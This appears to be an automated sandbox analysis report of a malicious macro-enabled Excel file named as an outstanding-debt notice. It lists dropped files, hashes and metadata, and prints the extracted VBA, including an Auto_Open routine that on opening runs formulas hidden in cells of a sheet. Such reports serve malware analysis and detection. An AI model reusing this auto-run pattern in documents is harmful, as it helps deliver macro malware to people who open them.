Preview: L..................F...........7G..:{.mMA..:{.mMA... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\928100\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......928100..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Outstanding-Debt-1754918061-05042021.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed May 5 00:24:44 2021, atime=Wed May 5 00:24:44 2021, length=117676, window=hide
Category:modified
Size (bytes):2298
Entropy (8bit):4.564022762105565
Encrypted:false
SSDEEP:48:8Q/XTFGq9wlp8CqQh2Q/XTFGq9wlp8CqQ/:8Q/XJGq9wACqQh2Q/XJGq9wACqQ/
MD5:7C856E5ADAFFC46C797B02D3A11C8E30
SHA1:D9D5F23B56C34E36DC4479052FFDBF2D73926762
SHA-256:E57CD22342D940FB77E8A6CD42DBD979D591601D7EB5360BB3BFD888801D7C90
SHA-512:A2992A62299F013CD235A499D75E8F9435307447156E6D21AF4D1CD0AD384736CA7CCC2CCBEE62C492FE8082AEFF46FE674A94E289228B0F7865EF1663CA705F
Malicious:false
Reputation:low
Preview: L..................F.... ....".{..:{.mMA..[..mMA...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .OUTSTA~1.XLS..........Q.y.Q.y*...8.....................O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.1.7.5.4.9.1.8.0.6.1.-.0.5.0.4.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\928100\Users.user\Desktop\Outstanding-Debt-1754918061-05042021.xlsm.@.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.1.7.5.4.9.1.8.0.6.1.-.0.5.0.4.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):163
Entropy (8bit):4.89170302234845
Encrypted:false
SSDEEP:3:oyBVomxWhl2BbtH58ZK6lyEW92BbtH58ZK6lmxWhl2BbtH58ZK6lv:djSlWO7W9WO/lWO1
MD5:DB18784CD80F10B1778579AD9358AA08
SHA1:A0477CFB7A64AC166B8402F78327CC4982A5B3BB
SHA-256:A567BE3CF59A8EAB1E425508C0ECD6F4CAF8A256753A689E629E3761EAC3532A
SHA-512:C6E237BC4AB7A6B8CACA3ED347B5B3C848B019DB47C4D6E9FADDAF6E9BDA215CBED25EF3D6A4272FDCC4155F12D8D860CDB6F33BD1D9B2885684CB4B3FB63443
Malicious:false
Reputation:low
Preview: Desktop.LNK=0..[misc]..Outstanding-Debt-1754918061-05042021.LNK=0..Outstanding-Debt-1754918061-05042021.LNK=0..[misc]..Outstanding-Debt-1754918061-05042021.LNK=0..
C:\Users\user\Desktop\06EE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):117676
Entropy (8bit):7.689137730764648
Encrypted:false
SSDEEP:3072:G8rvKINbjvw548LMb/oqKO8NnS8+60Kc6:G8mAbT648LM7D98Np+Ev
MD5:7CC089B2304EF9316ABA9B5480D9E1BF
SHA1:AF99A1D206A4930FFD732825B5A55C797CBC60C6
SHA-256:AF8AD8FD59F2101BC6C948A2ACE5E4BE506A7038357E1F692BA58B3D894C2768
SHA-512:3987EC112FA915635EF1B2631CFCBF238135872966BBC6276C55707175F634CA159221BA00D4F97C47F6465A44CF2051AAFD8FE65B8156D90ECB0EE0E2F7B83D
Malicious:false
Reputation:low
Preview: .U.n.0....?...".....r.y...I>.&..m.$H...K...$$@.zQ;.3\p..V.K.AYS..:"..a.2uE...._.....5P.5.r=..m..v...6."M..7cA4..@...+3.[.....q..5.....k".X.A&.[.......~.t2U..7...UE.sZ...Q.4..... .xi........VS..2.G.....rz.a..V....Xh..?P....rZ.....T..;..._.A.$....?.E..J.W..Sk..<or..%..h.-.-....>.k\.7Qg.re`.v........$.........5d..............4?{.:.&...,_?>?......B.-CFu....p..1.T.z..cw.!=.M-....}.....3..7...r.......;ap.7.B.e.N[...v......z..T]:........c.`.Nx....W.<..r.O........PK..........!.........*.......[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\Desktop\~$Outstanding-Debt-1754918061-05042021.xlsm
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):330
Entropy (8bit):1.4377382811115937
Encrypted:false
SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:96114D75E30EBD26B572C1FC83D1D02E
SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:true
Reputation:high, very likely benign file
Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:Microsoft Excel 2007+
Entropy (8bit):7.68857711695949
TrID:
  • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
  • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
  • ZIP compressed archive (8000/1) 7.58%
File name:Outstanding-Debt-1754918061-05042021.xlsm
File size:116934
MD5:5ac72cad6c794e97474276ba534aa095
SHA1:5236650b529792d7aa754c62e1db170a62ecc13d
SHA256:06b4a994cc6b9629775ebfcf818cd44267af85d7515980d4edc3c174ac47b6da
SHA512:49dd09144dcd2a2564545636491fd4a86c0b7263702d0ccdaa846795ea5d039df832dbf510f02c65e08c62b37e2e21540f8fe833925996a39b3db55914fc5673
SSDEEP:3072:1kYvKINbjvw548LMb/oqKO8NnS8+60Kc+ECx:WAbT648LM7D98Np+EdECx
File Content Preview:PK..........!."..R....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon

Icon Hash:e4e2aa8aa4bcbcac

Static OLE Info

General

Document Type:OpenXML
Number of OLE Files:1

OLE File "/opt/package/joesandbox/database/analysis/404114/sample/Outstanding-Debt-1754918061-05042021.xlsm"

Indicators

Has Summary Info:False
Application Name:unknown
Encrypted Document:False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:True

Summary

Author:Rabota
Last Saved By:Noped
Create Time:2015-06-05T18:19:34Z
Last Saved Time:2021-05-04T08:11:27Z
Creating Application:Microsoft Excel
Security:0

Document Summary

Thumbnail Scaling Desired:false
Company:
Contains Dirty Links:false
Shared Document:false
Changed Hyperlinks:false
Application Version:16.0300

Streams with VBA

VBA File Name: Blasr.bas, Stream Size: 1166
General
Stream Path:VBA/Blasr
VBA File Name:Blasr.bas
Stream Size:1166
Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 fd 03 00 00 00 00 00 00 01 00 00 00 1c cc 5e 9c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
"Blasr"
Application.Run
Attribute
Auto_Open()
VB_Name
Private
VBA Code
Attribute VB_Name = "Blasr"
Private Sub Auto_Open()
Application.Run Sheets("Nyukasl").Range("AJ6")

Application.Run Sheets("Nyukasl").Range("A5")
Application.Run Sheets("Nyukasl").Range("A5")






End Sub
VBA File Name: Briks.cls, Stream Size: 990
General
Stream Path:VBA/Briks
VBA File Name:Briks.cls
Stream Size:990
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 1e a1 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
"Briks"
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Briks"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
VBA File Name: Byutut.bas, Stream Size: 1056
General
Stream Path:VBA/Byutut
VBA File Name:Byutut.bas
Stream Size:1056
Data ASCII:. . . . . . . . . R . . . . . . . . . . . . . . . Y . . . . . . . . . . . . . . . . . ; G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 52 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 59 03 00 00 f5 03 00 00 00 00 00 00 01 00 00 00 1c cc 3b 47 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
VB_Name
"Byutut"
VBA Code
Attribute VB_Name = "Byutut"
VBA File Name: Class1.cls, Stream Size: 1151
General
Stream Path:VBA/Class1
VBA File Name:Class1.cls
Stream Size:1151
Data ASCII:. . . . . . . . . Z . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 5a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 61 03 00 00 c5 03 00 00 00 00 00 00 01 00 00 00 1c cc a3 ac 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Class2.cls, Stream Size: 999
General
Stream Path:VBA/Class2
VBA File Name:Class2.cls
Stream Size:999
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 7e e9 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Class3.cls, Stream Size: 999
General
Stream Path:VBA/Class3
VBA File Name:Class3.cls
Stream Size:999
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc c8 17 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Kikide.cls, Stream Size: 1249
General
Stream Path:VBA/Kikide
VBA File Name:Kikide.cls
Stream Size:1249
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . R . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 9a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff a1 03 00 00 29 04 00 00 00 00 00 00 01 00 00 00 1c cc 52 09 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
"Kikide"
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Kikide"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
VBA File Name: UserForm1.frm, Stream Size: 1526
General
Stream Path:VBA/UserForm1
VBA File Name:UserForm1.frm
Stream Size:1526
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { \\ . . B . H N . . . . . I . . . . . O < . * N . 7 { / a . . . 0 $ . . . v . K . . . . 1 . . . . . . . . . h : . . L N . . V = . 5 . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 00 01 00 00 9e 04 00 00 e4 00 00 00 84 02 00 00 ff ff ff ff a5 04 00 00 09 05 00 00 00 00 00 00 01 00 00 00 1c cc 2b 09 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 7b 5c fd e6 42 8a 48 4e aa cd df d6 fd 49 99 1c 83 98 07 4f 3c d6 2a 4e ad 37 7b 2f 61 a2 ba cd 30 24 1b a6 ea 76 1d 4b a3 81 e7 c2 31

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{4F079883-D63C-4E2A-AD37-7B2F61A2BACD}{A61B2430-76EA-4B1D-A381-E7C23109F48A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Vrest.bas, Stream Size: 679
General
Stream Path:VBA/Vrest
VBA File Name:Vrest.bas
Stream Size:679
Data ASCII:. . . . . . . . . " . . . . . . . . . . . . . . . ) . . . } . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 22 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 29 02 00 00 7d 02 00 00 00 00 00 00 01 00 00 00 1c cc 27 ea 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
"Vrest"
VB_Name
VBA Code
Attribute VB_Name = "Vrest"
VBA File Name: Vsewd.cls, Stream Size: 990
General
Stream Path:VBA/Vsewd
VBA File Name:Vsewd.cls
Stream Size:990
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc b2 ae 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
"Vsewd"
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Vsewd"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 856
General
Stream Path:PROJECT
File Type:ASCII text, with CRLF line terminators
Stream Size:856
Entropy:5.31019504221
Base64 Encoded:True
Data ASCII:I D = " { 4 4 8 1 7 C A 7 - 1 5 D A - 4 D 2 5 - B 4 C E - 4 7 0 F 9 E A 0 E 5 D F } " . . D o c u m e n t = K i k i d e / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = B r i k s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = B y u t u t . . D o c u m e n t = V s e w d / & H 0 0 0 0 0 0 0 0 . . C l a s s = C l a s s 1 . . C l a s s = C l a s s 2 . . C l a s s = C l a s s 3 . . M o d u l e = B l a s r . . M o d u l e = V r e s t . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4
Data Raw:49 44 3d 22 7b 34 34 38 31 37 43 41 37 2d 31 35 44 41 2d 34 44 32 35 2d 42 34 43 45 2d 34 37 30 46 39 45 41 30 45 35 44 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4b 69 6b 69 64 65 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 42 72 69 6b 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 42 79 75 74 75 74 0d 0a 44 6f 63 75 6d 65 6e 74 3d 56 73 65 77
Stream Path: PROJECTwm, File Type: data, Stream Size: 209
General
Stream Path:PROJECTwm
File Type:data
Stream Size:209
Entropy:3.32661660177
Base64 Encoded:False
Data ASCII:K i k i d e . K . i . k . i . d . e . . . B r i k s . B . r . i . k . s . . . B y u t u t . B . y . u . t . u . t . . . V s e w d . V . s . e . w . d . . . C l a s s 1 . C . l . a . s . s . 1 . . . C l a s s 2 . C . l . a . s . s . 2 . . . C l a s s 3 . C . l . a . s . s . 3 . . . B l a s r . B . l . a . s . r . . . V r e s t . V . r . e . s . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
Data Raw:4b 69 6b 69 64 65 00 4b 00 69 00 6b 00 69 00 64 00 65 00 00 00 42 72 69 6b 73 00 42 00 72 00 69 00 6b 00 73 00 00 00 42 79 75 74 75 74 00 42 00 79 00 75 00 74 00 75 00 74 00 00 00 56 73 65 77 64 00 56 00 73 00 65 00 77 00 64 00 00 00 43 6c 61 73 73 31 00 43 00 6c 00 61 00 73 00 73 00 31 00 00 00 43 6c 61 73 73 32 00 43 00 6c 00 61 00 73 00 73 00 32 00 00 00 43 6c 61 73 73 33 00 43
Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97
General
Stream Path:UserForm1/\x1CompObj
File Type:data
Stream Size:97
Entropy:3.61064918306
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
General
Stream Path:UserForm1/\x3VBFrame
File Type:ASCII text, with CRLF line terminators
Stream Size:266
Entropy:4.62034133633
Base64 Encoded:True
Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
Stream Path: UserForm1/f, File Type: data, Stream Size: 38
General
Stream Path:UserForm1/f
File Type:data
Stream Size:38
Entropy:1.54052096453
Base64 Encoded:False
Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
